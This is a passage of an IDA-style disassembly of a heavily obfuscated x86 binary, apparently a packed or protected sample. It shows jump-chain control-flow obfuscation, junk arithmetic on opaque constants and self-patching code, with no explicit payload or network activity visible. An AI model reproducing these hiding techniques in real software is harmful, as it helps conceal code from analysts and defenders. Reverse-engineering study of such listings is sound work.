loc_446672:				; CODE XREF: sub_45BE94-131BAj
		sub	edi, ecx
		jle	nullsub_265

loc_44667A:				; CODE XREF: sub_45BE94:loc_44CDDFj
					; k2vbe3.d:loc_45A072j
		mov	eax, [esp+8+var_8]
		call	sub_43DEFF
; END OF FUNCTION CHUNK	FOR sub_45BE94
; START	OF FUNCTION CHUNK FOR sub_443C0D

loc_446682:				; CODE XREF: sub_443C0D+80B0j
		jmp	loc_455427
; END OF FUNCTION CHUNK	FOR sub_443C0D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_446687:				; CODE XREF: sub_446E24:loc_45A1C1j
		pop	esi
		or	esi, 2AED313Ch
		jnz	loc_440311
; END OF FUNCTION CHUNK	FOR sub_446E24
; START	OF FUNCTION CHUNK FOR sub_448B5E

loc_446694:				; CODE XREF: sub_448B5E-9498j
		jmp	loc_44ED1C
; END OF FUNCTION CHUNK	FOR sub_448B5E
; ---------------------------------------------------------------------------
		shl	eax, 11h
		shr	esi, 0Dh
		jmp	loc_44030C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449372

loc_4466A4:				; CODE XREF: sub_449372:loc_450EA0j
		pop	edi
		and	edi, 3EAC48C8h
		sub	edi, 0F55F2DE5h
		xor	edi, 406E091Bh

loc_4466B7:				; CODE XREF: k2vbe3.d:loc_448410j
		add	edi, 8B970CE8h
		push	offset sub_454A93
		jmp	loc_45923D
; END OF FUNCTION CHUNK	FOR sub_449372
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E90D

loc_4466C7:				; CODE XREF: sub_44E90D+1Bj
		and	eax, 4F7B930Ah
		jnz	loc_4515CE

loc_4466D3:				; CODE XREF: sub_44B667-2273j
		jmp	loc_454CB2
; END OF FUNCTION CHUNK	FOR sub_44E90D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450A7C

loc_4466D8:				; CODE XREF: sub_450A7C-DBF9j
		jmp	nullsub_498
; END OF FUNCTION CHUNK	FOR sub_450A7C
; ---------------------------------------------------------------------------
		xchg	edx, [edi]
		jmp	loc_4515CD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44249A

loc_4466E4:				; CODE XREF: sub_44249A:loc_44FA22j
		xchg	ebx, [esp+138h+var_138]
		mov	ecx, ebx
		pop	ebx
		rol	ecx, 18h
		xor	ecx, 3C0AD49h
		add	ecx, ebp
		call	sub_45524B
; END OF FUNCTION CHUNK	FOR sub_44249A
; START	OF FUNCTION CHUNK FOR sub_447E07

loc_4466FA:				; CODE XREF: sub_447E07+FF9Fj
		jmp	loc_456674
; END OF FUNCTION CHUNK	FOR sub_447E07
; ---------------------------------------------------------------------------

loc_4466FF:				; CODE XREF: k2vbe3.d:0044297Dj
		mov	eax, [esp]
		push	edx
		call	sub_43E135
		mov	eax, 524E554Eh
		call	sub_456DB3

loc_446712:				; CODE XREF: k2vbe3.d:0044519Aj
		ja	loc_446881
		push	edx
		jmp	sub_43DA0B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB59

loc_44671E:				; CODE XREF: k2vbe3.d:00449705j
					; sub_44DB59-371Dj
		xor	eax, 0B3F0533Bh
		add	eax, ebp
		add	eax, 0D3FC945Eh
		mov	eax, [eax]
		jmp	loc_454AAB
; END OF FUNCTION CHUNK	FOR sub_44DB59
; ---------------------------------------------------------------------------

loc_446733:				; CODE XREF: k2vbe3.d:loc_45A01Fj
		add	edx, 5B904E8Ch
		add	edx, ebp
		add	edx, 1BA76EEEh
		mov	edx, [edx]
		call	sub_45423A
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_446748:				; CODE XREF: sub_44C90E+19j
		jmp	loc_457345
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
		sub	ebx, ecx
		add	ebp, 0DDEA66E2h
		jmp	sub_455E32
; ---------------------------------------------------------------------------

loc_44675A:				; CODE XREF: k2vbe3.d:loc_455617j
		jnz	loc_457DAC
		jmp	loc_43E628
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_446765:				; CODE XREF: sub_45A323-6B1j
		push	932C3DBBh
; END OF FUNCTION CHUNK	FOR sub_45A323
; START	OF FUNCTION CHUNK FOR sub_4529E2

loc_44676A:				; CODE XREF: sub_4529E2:loc_444263j
					; sub_45A323:loc_45A40Bj
		jz	loc_44F454
		lea	eax, [ebp-12Dh]
		push	edx
		mov	edx, eax
		xchg	edx, [esp+0]
		call	sub_4508A3
		jmp	loc_449BE4
; END OF FUNCTION CHUNK	FOR sub_4529E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449B8B

loc_446786:				; CODE XREF: sub_449B8B:loc_44AFACj
		pop	edx
		retn
; END OF FUNCTION CHUNK	FOR sub_449B8B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553CC

loc_446788:				; CODE XREF: k2vbe3.d:loc_43C26Aj
					; sub_4553CC+14j
		jmp	loc_449C4E
; END OF FUNCTION CHUNK	FOR sub_4553CC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FF59

loc_44678D:				; CODE XREF: sub_43FF59+2CFDj
		jmp	loc_4510C1
; END OF FUNCTION CHUNK	FOR sub_43FF59
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FDC1

loc_446792:				; CODE XREF: sub_43FDC1+8j
					; sub_446CE6+ECCCj
		rol	eax, 4
		push	eax
		push	ecx
		push	213641F1h
		jmp	loc_453549
; END OF FUNCTION CHUNK	FOR sub_43FDC1

; =============== S U B	R O U T	I N E =======================================



sub_4467A1	proc near		; CODE XREF: k2vbe3.d:loc_44DD26j
					; DATA XREF: sub_45000F+3424o

var_4		= dword	ptr -4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 0043C6C7 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0043D33F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F022 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F2F3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441CEB SIZE 00000030 BYTES
; FUNCTION CHUNK AT 00441FB9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00443053 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00444961 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445636 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004485FE SIZE 00000012 BYTES
; FUNCTION CHUNK AT 0044AA15 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B506 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D49A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F378 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0045017D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00450DF3 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00452576 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00452647 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452DB3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453A2B SIZE 0000001A BYTES
; FUNCTION CHUNK AT 004545B3 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045569D SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00456EEF SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00458370 SIZE 00000003 BYTES
; FUNCTION CHUNK AT 00459399 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A2E7 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045A4AC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045B885 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045BE69 SIZE 00000012 BYTES

		add	eax, 0BFAF763Fh
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_45A2E7
		jmp	loc_444961
sub_4467A1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B20A

loc_4467B6:				; CODE XREF: sub_45B20A-8FE9j
		and	eax, ebx

loc_4467B8:				; CODE XREF: sub_45B20A:loc_453F26j
		add	ecx, 0F44FC11Bh
		add	ecx, ebp
		push	ebx
		push	265E441Dh
		pop	ebx
		jmp	loc_448756
; END OF FUNCTION CHUNK	FOR sub_45B20A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A2DF

loc_4467CC:				; CODE XREF: sub_44A2DF:loc_44D680j
		jz	loc_455644

loc_4467D2:				; CODE XREF: sub_4490B2+DB38j
		jmp	sub_4479A1
; END OF FUNCTION CHUNK	FOR sub_44A2DF
; ---------------------------------------------------------------------------
		ror	esi, 13h
		xchg	eax, edi
; START	OF FUNCTION CHUNK FOR sub_44498A

loc_4467DC:				; CODE XREF: sub_44498A+126F8j
		jmp	loc_455644
; END OF FUNCTION CHUNK	FOR sub_44498A

; =============== S U B	R O U T	I N E =======================================



sub_4467E1	proc near		; CODE XREF: sub_450A99:loc_43ED62p
					; k2vbe3.d:00457168j
		xchg	ebx, [esp+0]
		pop	ebx

loc_4467E5:				; CODE XREF: k2vbe3.d:00458176j
		call	sub_43E282

loc_4467EA:				; CODE XREF: sub_4401FF+4j
		call	sub_43D83F

loc_4467EF:				; CODE XREF: k2vbe3.d:00440BF1j
		sbb	eax, ebp
		mov	ebx, 4B07A88Bh
sub_4467E1	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_43EEC6

loc_4467F6:				; CODE XREF: sub_43EEC6+1D16j
		add	esi, 0F772EC1Ah
		add	ebp, esi
		add	ebp, 5F08D28Eh
		push	ebp
		pop	esi
		mov	esi, [esi]
		jmp	loc_446EF3
; END OF FUNCTION CHUNK	FOR sub_43EEC6

; =============== S U B	R O U T	I N E =======================================



sub_44680D	proc near		; CODE XREF: sub_43DEBE:loc_43FFB2p
					; k2vbe3.d:004432C0j

; FUNCTION CHUNK AT 00443F7F SIZE 00000028 BYTES
; FUNCTION CHUNK AT 0044EF19 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 0044FEAE SIZE 00000018 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		add	esi, 32E2FA51h
		xor	eax, esi
		pop	esi
		ror	eax, 1Bh
		push	edi
		push	26CEE9D9h
		jmp	loc_44FEAE
sub_44680D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D316

loc_446828:				; CODE XREF: sub_44D316:loc_44DC7Ej
		mov	edx, [ebp+8]
		or	[edx-8], eax
		jmp	loc_45131D
; ---------------------------------------------------------------------------

loc_446833:				; CODE XREF: sub_456541-11B07j
					; sub_44D316+4j
		cmp	dword ptr [ebp-10h], 1
		jnz	loc_443762
		mov	eax, [ebp+8]
		jmp	loc_451E11
; END OF FUNCTION CHUNK	FOR sub_44D316
; ---------------------------------------------------------------------------
		pop	edx
		mov	eax, [esp]
		call	sub_44CF60
; START	OF FUNCTION CHUNK FOR sub_43C206

loc_44684E:				; CODE XREF: sub_43C206+Bj
		jmp	nullsub_42
; END OF FUNCTION CHUNK	FOR sub_43C206
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443FC1

loc_446853:				; CODE XREF: sub_443FC1:loc_44D3C2j
					; k2vbe3.d:0044D3ECj
		and	ebx, 0BB8EC247h
		sub	ebx, 1E1F9870h
		add	ebx, 0E456510Bh
		popf
		xchg	ebx, [esp-4+arg_0]
		jmp	sub_4553CC
; END OF FUNCTION CHUNK	FOR sub_443FC1
; ---------------------------------------------------------------------------

loc_44686E:				; CODE XREF: k2vbe3.d:loc_455CCEj
		pop	eax
		and	eax, ds:4000EFh
		sub	eax, 440DB4D8h
		xor	eax, 9B071A69h

loc_446881:				; CODE XREF: k2vbe3.d:loc_446712j
		add	eax, 88B462Bh
		call	sub_45AA40
		jmp	loc_43E599
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454EBB

loc_446891:				; CODE XREF: sub_454EBB+4j
		setnz	byte ptr [ebp-5]
		jmp	loc_454E3D
; END OF FUNCTION CHUNK	FOR sub_454EBB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_291. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44689B:				; CODE XREF: k2vbe3.d:004557AEj
		jmp	loc_43E784
; ---------------------------------------------------------------------------

loc_4468A0:				; CODE XREF: k2vbe3.d:0045357Ej
		jmp	loc_44DDCF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_488. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4568DA

loc_4468A6:				; CODE XREF: sub_4568DA+16j
		jmp	loc_44D5B6
; END OF FUNCTION CHUNK	FOR sub_4568DA
; ---------------------------------------------------------------------------
		push	196FB401h
		pop	edx
		and	edx, 0CE2F4D1Ch
		or	edx, 13669199h
		sub	edx, 94BB0822h
		test	edx, 200h
		jmp	loc_44C81E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45244A

loc_4468CE:				; CODE XREF: sub_45244A+83j
		add	esi, ebp
		add	esi, 3162B708h
		mov	[esi], eax
		pop	esi
		xor	eax, eax
		mov	[ebp-10h], eax
		cmp	dword ptr [ebp-4], 0
		jz	loc_455177
		jmp	loc_44F33F
; END OF FUNCTION CHUNK	FOR sub_45244A
; ---------------------------------------------------------------------------

loc_4468ED:				; CODE XREF: k2vbe3.d:00446189j
		jno	loc_4479F3

loc_4468F3:				; CODE XREF: k2vbe3.d:loc_44171Dj
		push	offset loc_44A5C9
		jmp	locret_44A3CD
; ---------------------------------------------------------------------------

loc_4468FD:				; CODE XREF: k2vbe3.d:0044D5DEj
		cdq

; =============== S U B	R O U T	I N E =======================================



sub_4468FE	proc near		; CODE XREF: sub_43F26C+3p

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0043C4D2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043CB55 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043E27D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043EDA9 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441A63 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 004432F3 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 004477E9 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044A69D SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0044C673 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E72C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F34B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451D3A SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045367A SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00455590 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045799F SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0045AC65 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045AE2E SIZE 0000001A BYTES

		xchg	ecx, [esp+8+var_8]
		pop	ecx
		push	ebp
		mov	ebp, ecx
		xchg	ebp, [esp+8+var_8]
		jmp	loc_44E72C
sub_4468FE	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449372

loc_44690D:				; CODE XREF: k2vbe3.d:loc_4446C1j
					; sub_449372+2F05j
		pop	ebp
		pop	eax
		jmp	loc_444C88
; ---------------------------------------------------------------------------

loc_446914:				; CODE XREF: sub_449372+2350j
		sub	edx, eax
		ror	edx, 0Ah
		and	ebx, ecx
		pop	eax
		pop	ebx
		jmp	loc_4491D6
; END OF FUNCTION CHUNK	FOR sub_449372
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_110. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B912

loc_446923:				; CODE XREF: sub_44B912+B056j
		push	0FECA2B88h
		jmp	loc_44E564
; END OF FUNCTION CHUNK	FOR sub_44B912
; ---------------------------------------------------------------------------

locret_44692D:				; CODE XREF: k2vbe3.d:loc_45630Aj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443BDF

loc_44692E:				; CODE XREF: sub_443BDF+371Ej
		jmp	loc_43D14E
; END OF FUNCTION CHUNK	FOR sub_443BDF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45101A

loc_446933:				; CODE XREF: sub_45101A:loc_452210j
		jnz	loc_44C27C
		jmp	loc_457CB8
; END OF FUNCTION CHUNK	FOR sub_45101A

; =============== S U B	R O U T	I N E =======================================



sub_44693E	proc near		; DATA XREF: k2vbe3.d:loc_44470Bo

; FUNCTION CHUNK AT 0045007C SIZE 00000005 BYTES

		xor	eax, 0E0684F64h
		call	sub_4553CC
		push	offset sub_44C46F
		jmp	loc_45007C
sub_44693E	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458DAF

loc_446953:				; CODE XREF: sub_458DAF+12j
		jnz	loc_458BBF
		jmp	loc_4445DD
; END OF FUNCTION CHUNK	FOR sub_458DAF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_83. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44695F:				; CODE XREF: k2vbe3.d:004532E6j
		jmp	loc_4428FB

; =============== S U B	R O U T	I N E =======================================



sub_446964	proc near		; CODE XREF: sub_44C40D+11p

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0043C39F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044054D SIZE 0000001F BYTES
; FUNCTION CHUNK AT 004429C2 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00446142 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B18B SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0044C1F2 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045164D SIZE 00000005 BYTES

		push	ecx
		mov	ecx, ebp
		xchg	ecx, [esp+0]
		jmp	loc_446142
sub_446964	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_171. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_446970:				; CODE XREF: k2vbe3.d:004554CCj
		jmp	loc_44512D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441409

loc_446975:				; CODE XREF: sub_441409+7794j
		jmp	loc_44A7B1
; END OF FUNCTION CHUNK	FOR sub_441409
; ---------------------------------------------------------------------------
		jmp	loc_45C16C
; ---------------------------------------------------------------------------

loc_44697F:				; CODE XREF: k2vbe3.d:0043D71Cj
		jmp	loc_454F0C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44660F

loc_446984:				; CODE XREF: sub_44660F+EEE6j
		jnp	nullsub_189
		pushf
		jno	loc_4570C9
		test	ebp, edx
		jmp	loc_4582F3
; END OF FUNCTION CHUNK	FOR sub_44660F
; ---------------------------------------------------------------------------

loc_446998:				; DATA XREF: sub_44B495:loc_44A2FCo
		push	610B361h
		pop	eax
		and	eax, 0A4AD7A2h
		add	eax, 0D4047014h
		jmp	loc_441EA0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_4469AF:				; CODE XREF: sub_43CCD0:loc_44ECEEj
		cmp	eax, esi
		jmp	loc_456BF5
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44314D

loc_4469B6:				; CODE XREF: sub_44314D:loc_459552j
		mov	byte ptr [ebp+eax-100h], 0
		push	2010h
		push	0
		jmp	loc_4509D9
; END OF FUNCTION CHUNK	FOR sub_44314D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457DCA

loc_4469CA:				; CODE XREF: sub_457DCA:loc_43D902j
					; sub_457DCA:loc_45AF03j
		push	7A9F243Eh
		pop	eax
		or	eax, 7979D089h
		jns	loc_45520E

loc_4469DC:				; CODE XREF: sub_451F2D+Aj
		jmp	loc_4440EA
; END OF FUNCTION CHUNK	FOR sub_457DCA

; =============== S U B	R O U T	I N E =======================================



sub_4469E1	proc near		; CODE XREF: k2vbe3.d:00448F4Dj
					; sub_44E4CE+6191p

; FUNCTION CHUNK AT 0043C0B0 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0043C814 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004405B5 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00443962 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00446AC0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044DC4F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00459C98 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0045B524 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		mov	ebp, esp
		push	ecx
		mov	esp, ebp
		jmp	loc_43C814
sub_4469E1	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44498A

loc_4469EF:				; CODE XREF: sub_44498A+9j
		pop	edi
		add	edi, 0C33A709Ch
		cmp	edi, 87258707h
		jmp	loc_43E273
; END OF FUNCTION CHUNK	FOR sub_44498A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4580DF

loc_446A01:				; CODE XREF: sub_4580DF-FE75j
		jz	loc_44FC92

loc_446A07:				; CODE XREF: sub_45B4A2-1C78Aj
		jmp	loc_44033B
; END OF FUNCTION CHUNK	FOR sub_4580DF
; ---------------------------------------------------------------------------
		jl	loc_454377
		sub	ebx, 0BFDA7C22h
		ror	esi, 0Fh
		and	eax, esi
		jmp	loc_44FC90
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_434. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456706

loc_446A23:				; CODE XREF: sub_456706-33DCj
		jmp	loc_443F4E
; END OF FUNCTION CHUNK	FOR sub_456706
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448834

loc_446A28:				; CODE XREF: sub_448834:loc_45284Bj
		push	edi

loc_446A29:				; CODE XREF: sub_45B20A-11AB1j
		mov	edi, ecx
		xchg	edi, [esp+4+var_4]
		push	ebx
		push	0CF2C6DECh
		jmp	loc_44A1E2
; END OF FUNCTION CHUNK	FOR sub_448834
; ---------------------------------------------------------------------------

loc_446A39:				; CODE XREF: k2vbe3.d:00455861j
		jge	loc_44807E
; START	OF FUNCTION CHUNK FOR sub_44B39A

loc_446A3F:				; CODE XREF: sub_44B39A-EC72j
		jmp	loc_45515A
; END OF FUNCTION CHUNK	FOR sub_44B39A
; ---------------------------------------------------------------------------
		pop	ebp
		xor	edi, 0E1761CC8h
		jmp	loc_448076
; ---------------------------------------------------------------------------

loc_446A50:				; CODE XREF: k2vbe3.d:00453B5Cj
		push	40EE7A0Ch
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_446A55:				; CODE XREF: sub_44C90E:loc_453B4Ej
		add	edx, 3690E481h
		xor	edx, 8EE666C8h
		xchg	edx, [esp+124h+var_124]
		push	10h
		jmp	loc_44BCF3
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------

loc_446A6B:				; CODE XREF: k2vbe3.d:loc_44A138j
		jl	loc_457001
		popf
		mov	edx, [eax]
		jmp	loc_456FFF
; ---------------------------------------------------------------------------

loc_446A79:				; CODE XREF: k2vbe3.d:0044D2E1j
		popf
		add	eax, edi
		and	ecx, esi
		jg	loc_453277
		jmp	loc_446E35
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45830D

loc_446A89:				; CODE XREF: sub_45830D:loc_45A1C6j
		adc	edi, eax
		jnp	loc_456D3B
		push	83AD429Eh
		jmp	loc_45A42D
; END OF FUNCTION CHUNK	FOR sub_45830D
; ---------------------------------------------------------------------------
		mov	eax, 0D59435E2h
		call	sub_4553CC
		mov	ds:off_41E070, eax
		lea	eax, sub_4526F4
		call	sub_43E026
; START	OF FUNCTION CHUNK FOR sub_459DA3

loc_446AB6:				; CODE XREF: sub_459DA3+7j
		jmp	loc_4412C4
; END OF FUNCTION CHUNK	FOR sub_459DA3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB59

loc_446ABB:				; CODE XREF: sub_44DB59+B550j
		jmp	loc_446B64
; END OF FUNCTION CHUNK	FOR sub_44DB59
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4469E1

loc_446AC0:				; CODE XREF: sub_4469E1+7274j
		jmp	loc_4405B5
; END OF FUNCTION CHUNK	FOR sub_4469E1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44662B

loc_446AC5:				; CODE XREF: sub_44662B:loc_44F89Aj
		call	sub_458019

loc_446ACA:				; CODE XREF: sub_456666-BDA5j
		jmp	loc_44124D
; END OF FUNCTION CHUNK	FOR sub_44662B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B74D

loc_446ACF:				; CODE XREF: sub_45B74D+1j
		mov	ebp, esp
		jb	sub_453DB9
		add	esp, 0FFFFFFF8h
		mov	[ebp-8], edx
		mov	[ebp-4], eax
		jmp	loc_450F19
; END OF FUNCTION CHUNK	FOR sub_45B74D
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_342. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44071B

loc_446AE6:				; CODE XREF: sub_44071B+6j
		mov	[ebp+var_4], eax
		mov	eax, [ebp+var_4]
		movzx	eax, byte ptr [eax]
		mov	edx, [ebp+arg_0]
		jmp	loc_45688D
; END OF FUNCTION CHUNK	FOR sub_44071B
; ---------------------------------------------------------------------------

loc_446AF7:				; CODE XREF: k2vbe3.d:00452075j
		jge	loc_45B18B
		cmp	eax, 0D2E6C8Dh

loc_446B03:				; CODE XREF: k2vbe3.d:0043C5B1j
		jmp	loc_43ECE6
; ---------------------------------------------------------------------------

loc_446B08:				; DATA XREF: sub_459D58:loc_442444o
		mov	[esi], eax
		pop	esi
		lea	eax, sub_456FED
		mov	byte ptr [eax],	0C3h
		jmp	loc_44ADAD

; =============== S U B	R O U T	I N E =======================================



sub_446B19	proc near		; CODE XREF: sub_4198C0+94p
					; sub_446B19:loc_44080Aj
					; DATA XREF: ...

; FUNCTION CHUNK AT 0044080A SIZE 00000006 BYTES

		call	sub_44081A
		jmp	loc_44080A
sub_446B19	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456666

loc_446B23:				; CODE XREF: sub_456666:loc_458F01j
		jz	loc_43DF77

loc_446B29:				; CODE XREF: k2vbe3.d:00450702j
		jmp	loc_44F935
; END OF FUNCTION CHUNK	FOR sub_456666
; ---------------------------------------------------------------------------
		mov	ecx, 9A5D3E5Fh
		sbb	edi, ebx
		jmp	loc_43DF73
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448113

loc_446B3A:				; CODE XREF: sub_448113:loc_455F16j
		mov	eax, [ebp+var_4]
		push	offset loc_453FE9
		jmp	nullsub_274
; END OF FUNCTION CHUNK	FOR sub_448113
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D023

loc_446B47:				; CODE XREF: sub_43D023+14E85j
		jnz	loc_43D31C
		sub	ebp, 5ABF305Bh

loc_446B53:				; CODE XREF: sub_43D023:loc_440AF5j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_43F02C
		jmp	loc_453402
; END OF FUNCTION CHUNK	FOR sub_43D023
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DB59

loc_446B64:				; CODE XREF: sub_44DB59:loc_446ABBj
		jz	loc_453FA9
		jmp	loc_443D5E
; END OF FUNCTION CHUNK	FOR sub_44DB59
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C68E

loc_446B6F:				; CODE XREF: sub_43C68E+1561Fj
		or	ebp, 0D3D7220Eh
		or	esi, 5AB5653h
		jmp	loc_458662
; END OF FUNCTION CHUNK	FOR sub_43C68E
; ---------------------------------------------------------------------------
		sbb	ebp, edi
		jmp	sub_456C15
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45830D

loc_446B87:				; CODE XREF: sub_45830D+8j
		jnz	loc_45A430
		jmp	loc_45A1C6
; END OF FUNCTION CHUNK	FOR sub_45830D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449372

loc_446B92:				; CODE XREF: sub_449372+C312j
		push	esi
		mov	esi, eax
		xchg	esi, [esp+0]
		push	edi
		jmp	loc_448BA2
; END OF FUNCTION CHUNK	FOR sub_449372
; ---------------------------------------------------------------------------
		popf
		jmp	loc_44937A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4568DA

loc_446BA4:				; CODE XREF: sub_4568DA:loc_454AC5j
		jb	loc_43CDF4
		jmp	loc_45116E
; END OF FUNCTION CHUNK	FOR sub_4568DA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440621

loc_446BAF:				; CODE XREF: sub_440621+15F8j
		jz	loc_44479F
		jmp	loc_44F8FA
; END OF FUNCTION CHUNK	FOR sub_440621
; ---------------------------------------------------------------------------

